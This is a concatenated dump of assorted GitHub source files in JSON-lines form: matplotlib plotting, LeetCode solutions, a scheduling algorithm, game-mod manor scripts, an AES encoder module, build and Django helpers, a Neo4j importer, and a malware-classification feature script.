np.pi, resolution)\n z = np.linspace(-height/2, height/2, resolution)\n\n Phi, Z = np.meshgrid(phi, z)\n\n X = radius * np.cos(Phi)\n Y = radius * np.sin(Phi)\n\n return [X, Y, Z]\n\n\ndef plot_or_update_line(ax, xs, ys, zs, c=None, marker=None, line=None):\n if line:\n line.set_data(xs, ys)\n line.set_3d_properties(zs)\n return line\n else:\n l, = ax.plot(xs, ys, zs, c=c, marker=marker)\n return l\n\n\ndef plot_or_update_plane(ax, xs, ys, zs, c=None, line=None, alpha=None):\n if False and line:\n line.set_data(xs, ys)\n line.set_3d_properties(zs)\n return line\n else:\n l = ax.plot_surface(xs, ys, 
zs, color=c, alpha=alpha)\n        return l\n\n\ndef draw_line(ax, start, end, c=\"r\", marker=\"\", line=None):\n    xs, ys, zs = np.array([start, end]).T\n    return plot_or_update_line(ax, xs, ys, zs, c=c, marker=marker, line=line)\n\n\ndef plot_axis(ax, lengths=[1, 1, 1]):\n    x_length, y_length, z_length = lengths\n\n    draw_line(ax, [-x_length, 0, 0], [x_length, 0, 0], c=\"r\", marker=\"o\"),\n    draw_line(ax, [0, -y_length, 0], [0, y_length, 0], c=\"g\", marker=\"o\"),\n    draw_line(ax, [0, 0, -z_length], [0, 0, z_length], c=\"b\", marker=\"o\"),\n\n\ndef rotate(matrix, rotation):\n    r = R.from_euler('xyz', rotation)\n    return matrix @ r.as_matrix()\n\n\ndef vec_length(vec):\n    return np.sqrt(np.sum(np.square(vec)))\n\n\ndef draw_vector_cylinder(ax, vec, radius=0.1, line=None, r=[]):\n    length = vec_length(vec)\n    cylinder = meshgrid_to_matrix(create_cylinder(radius, length, 20))\n\n    # Rotate cylinder to match vector\n    x, y, z = r\n    rotated = rotate(cylinder, [x, y, z])\n\n    relocated = rotated # + vec\n\n    return plot_or_update_plane(ax, *matrix_to_meshgrid(relocated), c=\"r\", alpha=0.5, line=line)\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nplt.subplots_adjust(left=0.25, bottom=0.25)\n\nrx = Slider(plt.axes([0.25, 0.1, 0.65, 0.03]), 'X', 0, np.pi, valinit=0)\nry = Slider(plt.axes([0.25, 0.15, 0.65, 0.03]), 'Y', 0, np.pi, valinit=0)\nrz = Slider(plt.axes([0.25, 0.30, 0.65, 0.03]), 'Z', 0, np.pi, valinit=0)\n\nla = None\nlb = None\n\ndef draw():\n    global la, lb\n\n    vec = np.array([1, 1, 1])/2\n\n    plot_axis(ax, [3, 3, 3])\n    la = draw_line(ax, [rx.val, ry.val, rz.val], vec, c=\"orange\", marker=\"o\")\n    lb = draw_vector_cylinder(ax, vec, r=[rx.val, ry.val, rz.val])\n\ndef update(val):\n    ax.cla()\n    draw()\n    fig.canvas.draw_idle()\n\nrx.on_changed(update)\nry.on_changed(update)\nrz.on_changed(update)\n\ndraw()\nplt.show()\n","repo_name":"nosknut/IELET2103-Robotikk","sub_path":"Simulations/matplotlib/rotate_cylinder_update_line.py","file_name":"rotate_cylinder_update_line.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35213769114","text":"#\n# @lc app=leetcode id=1163 lang=python3\n#\n# [1163] Last Substring in Lexicographical Order\n#\n# https://leetcode.com/problems/last-substring-in-lexicographical-order/description/\n#\n# algorithms\n# Hard (34.86%)\n# Likes:    216\n# Dislikes: 289\n# Total Accepted:    16.7K\n# Total Submissions: 47.7K\n# Testcase Example:  '\"abab\"\\r'\n#\n# Given a string s, return the last substring of s in lexicographical\n# order.\n# \n# \n# Example 1:\n# \n# \n# Input: \"abab\"\n# Output: \"bab\"\n# Explanation: The substrings are [\"a\", \"ab\", \"aba\", \"abab\", \"b\", \"ba\", \"bab\"].\n# The lexicographically maximum substring is \"bab\".\n# \n# \n# Example 2:\n# \n# \n# Input: \"leetcode\"\n# Output: \"tcode\"\n# \n# \n# \n# \n# Note:\n# \n# \n# 1 <= s.length <= 4 * 10^5\n# s contains only lowercase English letters.\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n    def lastSubstring(self, s: str) -> str:\n        '''\n        The answer is always the lexicographically largest suffix of s:\n        once we know the best starting index, the answer is s[index:].\n        Keep two pointers: left marks the best start found so far, while\n        right scans ahead looking for a larger starting character.\n        step handles ties: while s[left + step] == s[right + step], keep\n        comparing s[left + i] with s[right + i] (i = 1, 2, 3, ...) until one\n        side is larger or we hit the boundary right + step == len(s);\n        as soon as one side wins, reset step back to 0.\n        '''\n        s_len, left, right, step = len(s), 0, 1, 0\n        while(right + step < s_len):\n            if s[right + step] > s[left + step]:\n                left, right, step
= right, right+1, 0\n            elif s[right + step] < s[left + step]:\n                right, step = right+step+1, 0\n            else:\n                step += 1\n        return s[left:]\n\n# @lc code=end\n\n","repo_name":"ck2w/Leetcode","sub_path":"py/1163.last-substring-in-lexicographical-order.py","file_name":"1163.last-substring-in-lexicographical-order.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71228059040","text":"#\n# @lc app=leetcode.cn id=381 lang=python3\n#\n# [381] Insert Delete GetRandom O(1) - Duplicates allowed\n#\n\n# @lc code=start\nimport collections\nfrom random import choice\n\n\nclass RandomizedCollection:\n\n    def __init__(self):\n        self.nums = []\n        self.indexs = collections.defaultdict(lambda:set())\n\n\n    def insert(self, val: int) -> bool:\n        self.nums.append(val)\n        self.indexs[val].add(len(self.nums) - 1)\n        return len(self.indexs[val]) == 1\n\n\n    def remove(self, val: int) -> bool:\n        if val not in self.indexs:\n            return False\n        idx = list(self.indexs[val])[0]\n        last = self.nums[-1]\n        if idx == len(self.nums) - 1:\n            self.indexs[val].remove(idx)\n            if len(self.indexs[val]) == 0:\n                del self.indexs[val]\n            self.nums.pop()\n            return True\n        self.nums[idx] = last\n        self.indexs[val].remove(idx)\n        self.indexs[last].remove(len(self.nums) - 1)\n        if idx < len(self.nums) - 1:\n            self.indexs[last].add(idx)\n        if len(self.indexs[val]) == 0:\n            del self.indexs[val]\n        self.nums.pop()\n        return True\n\n\n    def getRandom(self) -> int:\n        return choice(self.nums)\n\n\n\n# Your RandomizedCollection object will be instantiated and called as such:\n# obj = RandomizedCollection()\n# param_1 = obj.insert(val)\n# param_2 = obj.remove(val)\n# param_3 = obj.getRandom()\n# @lc code=end\n\n","repo_name":"Jvaeyhcd/.leetcode","sub_path":"381.o-1-时间插入、删除和获取随机元素-允许重复.py","file_name":"381.o-1-时间插入、删除和获取随机元素-允许重复.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71307276318","text":"##===================================\n##File: dpc_dispatch.py\n##Author: Merrick Chang\n##Date: July 2019\n##===================================\n\n\nimport random\n\n\nclass DPCDispatch:\n    \"\"\"\n    Static methods related to the DPC-Dispatch algorithm from Planken (2013)\n    \"\"\"\n\n    @staticmethod\n    def dpc_dispatch(stn, seq, min_window = -1000, max_window = 1000):\n        \"\"\"\n        DPC-Dispatch algorithm from Planken (2013)\n        -------------------------------------------------------------------\n        Input:\n          stn, the target STN\n          seq, an ordering for the vertices in the STN in the form of a list of ints\n          min_window, a minimum time within which all the time points are executed\n          max_window, a maximum time within which all the time points are executed\n\n        Output:\n          schedule, a list of ints representing the execution times\n        -------------------------------------------------------------------\n        \"\"\"\n        time_windows = []\n        neighboor_hoods = []\n        schedule = []\n        if not stn.predecessor_edges or not stn.pred_edges_up_to_date:\n            stn.update_predecessors()\n        for n in range(stn.length):\n            time_windows.append([min_window, max_window])\n            schedule.append(float(\"inf\"))\n            neighbors = set(stn.successor_edges[n].keys())\n            neighbors.update(stn.predecessor_edges[n].keys())\n            neighboor_hoods.append(neighbors)\n        for k, v in enumerate(seq):\n            min_time, max_time = time_windows[v]\n            try:\n                schedule[v] = random.randint(min_time, max_time)\n            except ValueError:\n                print(\"Error: Min-Time Exceeds Max-Time...
The Max-Window Is Likely Too Low\")\n return False\n for neighbor in neighboor_hoods[v]:\n if seq.index(neighbor) > k:\n if neighbor in stn.predecessor_edges[v]:\n alt_min = schedule[v] - stn.predecessor_edges[v][neighbor]\n if time_windows[neighbor][0] < alt_min:\n time_windows[neighbor][0] = alt_min\n if neighbor in stn.successor_edges[v]:\n alt_max = stn.successor_edges[v][neighbor] + schedule[v]\n if time_windows[neighbor][1] > alt_max:\n time_windows[neighbor][1] = alt_max\n return schedule\n","repo_name":"MerrickChang/URSI-2020","sub_path":"src/algorithms/path_consist/dpc_dispatch.py","file_name":"dpc_dispatch.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23580358390","text":"from PIL import Image, ImageDraw, ImageFont\n\n# Create a new image with black background\nimg = Image.new('RGB', (1200, 630), color = 'black')\n\n# Load the fonts (adjust the paths and sizes as needed)\nfont1 = ImageFont.truetype('Ubuntu-Regular.ttf', 70)\nfont2 = ImageFont.truetype('Ubuntu-BoldItalic.ttf', 100)\n\nd = ImageDraw.Draw(img)\n\n# Convert hex color to RGB\ncolor = (115, 193, 252)\n\n# Add text to the image\nd.text((80,60), \"Julian Lopez Presents\", font=font1, fill=color)\nd.text((img.width//2, img.height//2), \"Domain of a Knight\", font=font2, fill=color, anchor='mm')\n\n# Save the image\nimg.save('output.png')\n","repo_name":"JLO64/JLO64.github.io","sub_path":"scripts/opengraph-images.py","file_name":"opengraph-images.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"851415860","text":"from header import *\n\n#script_update_manor_array\n\t# WARNING: this is totally new procedure (not present in native). 
1257AD devs\n\t#input: none\n\t#output: none\n\t#updates the trp_manor_array troop, which is the storage troop for manor id\nupdate_manor_array = (\n\t\"update_manor_array\",\n\t[\n\t\t\t (assign, \":slot_nr\", 1),\n\t\t (try_for_parties, \":party_id\"),\n\t\t\t (party_get_template_id,\":party_template\",\":party_id\"),\n\t\t (eq, \":party_template\", \"pt_manor\"),\n\t\t (troop_set_slot,\"trp_manor_array\",\":slot_nr\",\":party_id\"),\n\t\t (val_add, \":slot_nr\", 1),\t\t\n\t\t \n\t\t (party_get_slot, \":center\", \":party_id\", slot_village_bound_center), #get the village of the manor\n\t\t (party_set_slot,\":center\",village_slot_manor,\":party_id\"), #save the manor to the village\n\t\t #assign scenes\n\t\t (call_script, \"script_manor_set_unique_scene\", \":party_id\", \":center\"),\n\t\t (try_end), #cycle\n\t\t (troop_set_slot,\"trp_manor_array\",0,\":slot_nr\"), #zero hold the total amount of parties\n\t])\n\n\t\n\t#script_prepare_manor_troops\n\t#input:none\n\t#output:none\n\t#description: this will set the goods of the manor craftsman\nprepare_manor_troops = (\n\t\"prepare_manor_troops\",\n\t[\n\t\t(troop_set_slot,\"trp_manor_grain\", manor_troop_slot_good, itm_grain),\n\t\t(troop_set_slot,\"trp_manor_livestock\", manor_troop_slot_good, itm_wool),\n\t\t(troop_set_slot,\"trp_manor_fruit\", manor_troop_slot_good, itm_apples),\n\t\t(troop_set_slot,\"trp_manor_fisher\", manor_troop_slot_good, itm_smoked_fish),\n\t\t(troop_set_slot,\"trp_manor_baker\", manor_troop_slot_good, itm_bread),\n\t\t(troop_set_slot,\"trp_manor_winer\", manor_troop_slot_good, itm_wine),\n\t\t(troop_set_slot,\"trp_manor_brewer\", manor_troop_slot_good, itm_ale),\n\t\t(troop_set_slot,\"trp_manor_potter\", manor_troop_slot_good, itm_pottery),\n\t\t(troop_set_slot,\"trp_manor_blacksmith\", manor_troop_slot_good, itm_tools),\n\t\t(troop_set_slot,\"trp_manor_butcher\", manor_troop_slot_good, itm_dried_meat),\n\t\t(troop_set_slot,\"trp_manor_oilmaker\", manor_troop_slot_good, itm_oil),\n\t\t(troop_set_slot,\"trp_manor_linen\", manor_troop_slot_good, itm_linen),\n\t\t(troop_set_slot,\"trp_manor_wool\", manor_troop_slot_good, itm_wool_cloth),\n\t\t(troop_set_slot,\"trp_manor_tanner\", manor_troop_slot_good, itm_leatherwork),\t\n\t\t \n\t\t(troop_set_slot,\"trp_manor_trader_silk\", manor_troop_slot_good, itm_raw_silk),\n\t\t(troop_set_slot,\"trp_manor_trader_spice\", manor_troop_slot_good, itm_spice),\n\t\t(troop_set_slot,\"trp_manor_trader_dyes\", manor_troop_slot_good, itm_raw_dyes),\n\t\t(troop_set_slot,\"trp_manor_trader_salt\", manor_troop_slot_good, itm_salt),\n\t\t \n\t\t(troop_set_slot,\"trp_manor_grain\", manor_troop_slot_tax, manor_slot_tax_grainfarm),\n\t\t(troop_set_slot,\"trp_manor_livestock\", manor_troop_slot_tax, manor_slot_tax_livestock),\n\t\t(troop_set_slot,\"trp_manor_fruit\", manor_troop_slot_tax, manor_slot_tax_fruitfarm),\n\t\t(troop_set_slot,\"trp_manor_fisher\", manor_troop_slot_tax, manor_slot_tax_fisher),\n\t\t(troop_set_slot,\"trp_manor_baker\", manor_troop_slot_tax, manor_slot_tax_bakery),\n\t\t(troop_set_slot,\"trp_manor_winer\", manor_troop_slot_tax, manor_slot_tax_winery),\n\t\t(troop_set_slot,\"trp_manor_brewer\", manor_troop_slot_tax, manor_slot_tax_brewery),\n\t\t(troop_set_slot,\"trp_manor_potter\", manor_troop_slot_tax, manor_slot_tax_potter),\n\t\t(troop_set_slot,\"trp_manor_blacksmith\", manor_troop_slot_tax, manor_slot_tax_blacksmith),\n\t\t(troop_set_slot,\"trp_manor_butcher\", manor_troop_slot_tax, manor_slot_tax_butcher),\n\t\t(troop_set_slot,\"trp_manor_oilmaker\", 
manor_troop_slot_tax, manor_slot_tax_oilmaker),\n\t\t(troop_set_slot,\"trp_manor_linen\", manor_troop_slot_tax, manor_slot_tax_linenworkshop),\n\t\t(troop_set_slot,\"trp_manor_wool\", manor_troop_slot_tax, manor_slot_tax_woolworkshop),\n\t\t(troop_set_slot,\"trp_manor_tanner\", manor_troop_slot_tax, manor_slot_tax_tannery),\t\n\t])\n\t\n\t#script_spawn_manors - tom made\n\t# WARNING: this is totally new procedure (not present in native). 1257AD devs\n\t# INPUT: none\n\t# OUTPUT: none\n\t# DESCRIPTION: Spawns random manor type to villages, castles and towns\nspawn_manors = (\n\t\"spawn_manors\",\n\t[ \n\t\t(try_for_range, \":center\", centers_begin, centers_end),\n\t\t\t(neg|is_between, \":center\", castles_begin, castles_end),\n\t\t\t(store_faction_of_party, \":center_faction\", \":center\"),\n\t\t(is_between, \":center_faction\", kingdoms_begin, kingdoms_end),\n\t\t(store_random_in_range, \":random\", 0, 100),\n\t\t(lt, \":random\", 50),\n\t\t(call_script, \"script_spawn_manor_party\", \"pt_manor\", \":center\"),\n\t\t(try_end),\n\t\t\n\t\t(call_script, \"script_update_manor_array\"),\n\t])\n\t\n\t#script_spawn_manor_party - tom made\n\t# WARNING: this is totally new procedure (not present in native). 1257AD devs\n\t#input: party to spawn, center to bind to and spawn around it, bound and rename party(if 0 - not, only for manors).\n\t#output: reg0 - party id.\nspawn_manor_party = (\n\t\"spawn_manor_party\",\n\t[\n\t\t(store_script_param, \":random\", 1),\n\t\t(store_script_param, \":center\", 2),\n\t\t\n\t\t(set_spawn_radius, 7),\n\t\t(store_faction_of_party, \":center_faction\", \":center\"),\n\t\t(spawn_around_party, \":center\", \":random\"),\n\t\t(assign, \":party_id\", reg0),\n\t\t(try_begin), #this can fail?\n\t\t\t(party_get_position, pos0, \":center\"),\n\t\t\t(map_get_land_position_around_position, pos1, pos0, 5),\n\t\t(try_end),\n\t\t\n\t\t(party_get_position, pos0, \":center\"),\n\t\t(assign, \":upper_bound\", 3000),\n\t\t(try_for_range, reg1, 0, \":upper_bound\"),\n\t\t\t(map_get_land_position_around_position, pos1, pos0, 7),\n\t\t\t(assign, \":bad\", 0),\n\t\t\t(try_for_parties, \":parties\"),\n\t\t\t\t(this_or_next|is_between, \":parties\", centers_begin, centers_end),\n\t\t\t(eq, \":parties\", \"pt_manor\"),\n\t\t\t\t(party_get_position, pos2, \":parties\"),\n\t\t\t(get_distance_between_positions_in_meters, \":distance\", pos2, pos1),\n\t\t\t(try_begin),\n\t\t\t\t(lt, \":distance\", 1),\n\t\t\t\t(assign, \":bad\", 1),\n\t\t\t(try_end), \n\t\t\t(try_end),\n\t\t\t(try_begin),\n\t\t\t\t(eq, \":bad\", 0),\n\t\t\t\t(party_set_position,\":party_id\",pos1),\n\t\t\t(party_get_current_terrain, \":terrain\", \":party_id\"),\n\t\t\t(try_begin), #bridge/shore - means boo boo\n\t\t\t\t(eq, \":terrain\", rt_bridge),\n\t\t\t(else_try),\n\t\t\t\t(assign, \":upper_bound\", -8),\n\t\t\t(try_end),\n\t\t\t(try_end),\t\n\t\t(try_end),\n\t\t\n\t\t##spawn some random buildings in it\n\t\t(store_random_in_range, \":random\", 1, 5),\n\t\t(try_for_range, reg0, 0, \":random\"),\n\t\t\t(store_random_in_range, \":random_building\", manor_slot_marketplace, manor_slot_walls),\n\t\t\t(party_set_slot, \":party_id\", \":random_building\", manor_building_operational),\n\t\t(try_end),\n\t\t\n\t\t##add some random stats\n\t\t(try_begin),\n\t\t\t(store_random_in_range, \":population\", 10, 50),\n\t\t\t(store_random_in_range, \":prosperity\", 1, 10),\n\t\t\t(party_set_slot, \":party_id\", manor_slot_population, \":population\"),\n\t\t\t(party_set_slot, \":party_id\", slot_town_prosperity, 
\":prosperity\"),\n\t\t(try_end),\n\t\t\n\t\t#(party_set_position,\":party_id\",pos1),\n\t\t(party_set_faction,\":party_id\", \":center_faction\"),\n\t\t(party_set_slot, \":party_id\", slot_village_bound_center, \":center\"),\n\t\t(str_store_party_name, s0, \":center\"),\n\t\t(str_store_party_name, s1, \":party_id\"),\n\t\t(str_store_string, s2, \"@{s1} of {s0}\"),\n\t\t(party_set_name, \":party_id\", s2),\n\t\t(assign, reg0, \":party_id\"),\n\t])\n\n#script_update_manor_infested_by_bandits\n\t# WARNING: this is totally new procedure (not present in native). 1257AD devs\n\t#input: none\n\t#output: none\n\t#description: updates the manors with possible crysis. Called from triggers\n\t#0 - none\n\t#1 - regular bandits\n\t#2 - mercenery band rampaging\n\t#3 - two nobles conflicting\n\t#4 - angry peasents are angry for some reason\n\t#5 - \nupdate_manor_infested_by_bandits = (\n\t\"update_manor_infested_by_bandits\",\n\t [\n\t\t#0 - none\n\t\t#1 - regular bandits\n\t\t#2 - mercenery band rampaging\n\t\t#3 - two nobles conflicting\n\t\t#4 - angry peasents are angry for some reason\n\t\t#5 - \n\t\t(troop_get_slot,\":manor_amount\",\"trp_manor_array\",0),\n\t\t(try_for_range, \":slot\", 1, \":manor_amount\"),\n\t\t\t(troop_get_slot,\":manor\",\"trp_manor_array\",\":slot\"),\n\t\t(party_clear, \":manor\"),\n\t\t(party_set_slot, \":manor\", slot_village_state, svs_normal),\n\t\t(store_random_in_range, \":random\", 0, 100),\n\t\t(party_clear_particle_systems, \":manor\"),\n\t\t#manors with walls does not get infested(unique manors that is)\n\t\t(try_begin),\n\t\t\t(party_slot_eq, \":manor\", manor_slot_walls, manor_building_operational),\n\t\t\t(assign, \":random\", 0), #not infested\n\t\t(try_end),\n\t\t(try_begin), #monastery does not get infested\n\t\t\t(party_get_template_id, \":manor_template\", \":manor\"),\n\t\t\t(eq, \":manor_template\", \"pt_monastery\"),\n\t\t\t(assign, \":random\", 0), #not infested\n\t\t(try_end),\n\t\t\n\t\t#note manor bandits work diffrently from villages. We store id of the crysis, insted of the troop infesting it.\n\t\t\n\t\t(try_begin),\n\t\t\t(lt, \":random\", 80), \n\t\t\t(party_set_slot,\":manor\",slot_village_infested_by_bandits, 0),\n\t\t\t(party_clear_particle_systems, \":manor\"),\n\t\t(else_try),\n\t\t\t(store_random_in_range, \":random\", 1, 3),\n\t\t\t(party_set_slot,\":manor\",slot_village_infested_by_bandits,\":random\"),\n\t\t\t#(party_add_particle_system, \":manor\", \"psys_map_village_fire\"),\n\t\t\t\t\t(party_add_particle_system, \":manor\", \"psys_map_village_fire_smoke\"),\n\t\t\t(try_end),\n\t\t(try_end),\n\t ])","repo_name":"admiralnelson/modded_modded_1257ad","sub_path":"script/procedures/AD1257_manor_system.py","file_name":"AD1257_manor_system.py","file_ext":"py","file_size_in_byte":8880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73706969118","text":"from sneakers.modules import Encoder, Parameter\n\nimport scrypt\nimport base64\n\n# note that the class name *must* be title cased\nclass Aes(Encoder):\n description = \"\"\"\\\n Encrypts data using AES and the provided encryption key. 
The resulting bits are then base64 encoded to allow them to be represented as text.\n    \"\"\"\n\n    params = {\n        'sending': [\n            Parameter('key', True, 'String used as encryption key.')\n        ],\n        'receiving': [\n            Parameter('key', True, 'String used as encryption key.')\n        ]\n    }\n\n    def encode(self, data):\n        key = self.param('sending', 'key')\n        en = scrypt.encrypt(data, key.encode('ascii'), 0.1)\n        return base64.b64encode(en)\n\n    def decode(self, data):\n        key = self.param('receiving', 'key')  # decode with the receiving-side key\n        de = base64.b64decode(data)\n        return scrypt.decrypt(de, key.encode('ascii'))\n\n","repo_name":"DakotaNelson/sneaky-creeper","sub_path":"sneakers/encoders/aes.py","file_name":"aes.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"51"}
{"seq_id":"17611057363","text":"#!/usr/bin/env python\n\nimport os\nimport platform\nimport subprocess\nimport sys\n\nfrom lib.config import get_target_arch\n\n\nSOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n\ndef main():\n  os.chdir(SOURCE_ROOT)\n\n  update_external_binaries()\n  return update_gyp()\n\n\ndef update_external_binaries():\n  uf = os.path.join('script', 'update-external-binaries.py')\n  subprocess.check_call([sys.executable, uf])\n\n\ndef update_gyp():\n  # Since gyp doesn't support specifying link_settings for each configuration,\n  # we are not able to link to different libraries in \"Debug\" and \"Release\"\n  # configurations.\n  # In order to work around this, we decided to generate the configuration\n  # twice: once to generate the \"Debug\" config, and once to generate\n  # the \"Release\" config. And the settings are controlled by the variable\n  # \"libchromiumcontent_component\" which is defined before running gyp.\n  target_arch = get_target_arch()\n  return (run_gyp(target_arch, 0) or run_gyp(target_arch, 1))\n\n\ndef run_gyp(target_arch, component):\n  python = sys.executable\n  if sys.platform == 'cygwin':\n    # Force using win32 python on cygwin.\n    python = os.path.join('vendor', 'python_26', 'python.exe')\n  gyp = os.path.join('vendor', 'brightray', 'vendor', 'gyp', 'gyp_main.py')\n  defines = [\n    '-Dlibchromiumcontent_component={0}'.format(component),\n    '-Dtarget_arch={0}'.format(target_arch),\n    '-Dhost_arch={0}'.format(target_arch),\n    '-Dlibrary=static_library',\n  ]\n  return subprocess.call([python, gyp, '-f', 'ninja', '--depth', '.',\n                          'atom.gyp', '-Icommon.gypi'] + defines)\n\n\ndef get_host_arch():\n  if platform.architecture()[0] == '32bit':\n    return 'ia32'\n  else:\n    return 'x64'\n\n\nif __name__ == '__main__':\n  sys.exit(main())\n","repo_name":"rsvip/electron","sub_path":"script/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"36432045862","text":"from django.utils.six import wraps\nfrom django.http.response import HttpResponseForbidden\n\n\ndef requires_authentication(view):\n    '''\n    This decorator is used to decorate api views in order to make sure\n    that only authenticated users can use the api. 
Unauthorized or anonymous\n    users will receive an HTTP 403 FORBIDDEN response.\n    '''\n    @wraps(view)\n    def wrapper(request, *args, **kwargs):\n        if request.user.is_authenticated:\n            result = view(request, *args, **kwargs)\n            return result\n        return HttpResponseForbidden()\n    return wrapper\n\n\n# end of file\n","repo_name":"rabihkodeih/britecoretest","sub_path":"main/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"42871157963","text":"import csv\n\ntrain = open(r'asm_train.csv')\ntest = open(r'asm_test.csv')\n\nfeatures = ['dd', 'dw', 'db', 'align', 'push', 'mov', 'add', 'xor', 'cmp',\n            'jnz', 'or', 'jz', 'lea', 'test', 'pop', 'leave', 'retn', 'endp',\n            'call', 'inc', 'movzx', 'setnle', 'jmp']\nfeatures2 = [feat+'r' for feat in features]\n\nrows = []\nrows2 = []\nfor t, row in enumerate(train):\n    row = row.strip().split(',')\n    rows.append(row)\n    \nfor t, row in enumerate(test):\n    row = row.strip().split(',')\n    rows2.append(row)\n\nfor k, row in enumerate(rows):\n    if k == 0:\n        row.extend(features2)\n    if k >= 1:\n        Id = row[0]\n        Class = row[1]\n        values = row[2:]\n        summation = 0\n        newRow = row[:]\n        for i in values:\n            summation += int(i)\n        if summation == 0:\n            row.extend([0] * (len(row) - 2))\n            continue\n        for t, j in enumerate(row):\n            if t >= 2:\n                newRow.append(float(j) / summation)\n        rows[k] = newRow[:]\n\nfor k, row in enumerate(rows2):\n    if k == 0:\n        row.extend(features2)\n    if k >= 1:\n        Id = row[0]\n        values = row[1:]\n        summation = 0\n        newRow = row[:]\n        for i in values:\n            summation += int(i)\n        if summation == 0:\n            row.extend([0] * (len(row) - 1))\n            continue\n        for t, j in enumerate(row):\n            if t >= 1:\n                newRow.append(float(j) / summation)\n        rows2[k] = newRow[:]\n\npredictions_file = open(\"asm_tran_train.csv\", \"wb\")\nopen_file_object = csv.writer(predictions_file)\nopen_file_object.writerows(rows)\npredictions_file.close()\n\npredictions_file = open(\"asm_tran_test.csv\", \"wb\")\nopen_file_object = csv.writer(predictions_file)\nopen_file_object.writerows(rows2)\npredictions_file.close()\n","repo_name":"raman-sharma/Kaggle_Competitions","sub_path":"MalwareClassification/asm_transform.py","file_name":"asm_transform.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"72526911839","text":"import json\nimport os\n\ndef readChain(path):\n\n    with open(path, 'r') as file:\n        chain = json.load(file)\n    \n    for block in chain:\n        print(\"Block index:\", block['index'])\n        print('Timestamp:', block['timeStamp'])\n        print('Transactions:')\n        for tmp in block['transaction']:\n            print('  ', tmp['sender'], '->', tmp['receiver'], '(', tmp['amount'], ')')\n        print('Previous hash:', block['previousHash'])\n        print('Hash:', block['hash'])\n        print('Nonce:', block['nonce'])\n        print()\n\ndef main():\n    path = input('Enter path to chain: ')\n    if os.path.isfile(path):\n        readChain(path)\n    else:\n        print('Error! 
File not found')\n\n\nif __name__ == '__main__':\n    main()","repo_name":"Chmilko/blockchain","sub_path":"readChain.py","file_name":"readChain.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"71597948318","text":"from collections import defaultdict\nimport json\nimport os\n\nfrom database.neo4j import neo4j_db\n\nclass TranslateService:\n    def __init__(self) -> None:\n        pass\n    \n    @staticmethod\n    def get_ingredients_json():\n        path = os.getcwd() + \"/data/ingredients.json\"\n        with open(path, \"rt\", encoding=\"UTF8\") as f:\n            data = json.load(f)\n        \n        return data\n    \n    def insert_ingredients(self):\n        data = self.get_ingredients_json()\n\n        recipes = defaultdict(dict)\n        \n        for ing in data:\n            key = ing[\"RECIPE_ID\"]\n            recipes[key] = {\n                \"recipe_id\": key,\n                \"ingredients\": [*recipes[key].get(\"ingredients\", []), {\n                    \"order\": ing[\"IRDNT_SN\"],\n                    \"name_kr\": ing[\"IRDNT_NM\"], \n                    \"amount\": ing[\"IRDNT_CPCTY\"], \n                    \"type_code\": ing[\"IRDNT_TY_CODE\"], \n                    \"type_kr\": ing[\"IRDNT_TY_NM\"],\n                }]\n            }\n        \n        new_recipes = list(recipes.values())\n\n        neo_result = neo4j_db.execute_write(\n            query=\"\"\"\n            UNWIND $recipes AS recipe\n            MERGE (r:Recipe { recipe_id: recipe.recipe_id })\n            ON CREATE\n                SET r.uuid = randomUUID(),\n                    r.created_at = datetime()\n            ON MATCH\n                SET r.updated_at = datetime()\n\n            WITH r, recipe\n\n            UNWIND recipe.ingredients AS ing\n            MERGE (i:Ingredient { name: ing.name_kr })\n            ON CREATE\n                SET i.uuid = randomUUID(),\n                    i.created_at = datetime()\n            ON MATCH \n                SET i.updated_at = datetime()\n            \n            MERGE (r)-[m:MADE_BY]->(i)\n            ON CREATE\n                SET m.order = ing.order,\n                    m.amount = ing.amount,\n                    m.type = ing.type_kr,\n                    m.type_code = ing.type_code,\n                    m.created_at = datetime()\n            ON MATCH\n                SET m.updated_at = datetime()\n            \"\"\",\n            params={ \"recipes\": new_recipes }\n        )\n        \n        return neo_result\n","repo_name":"Bernese-Corgi/Neo4J","sub_path":"Food-GDB/service/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
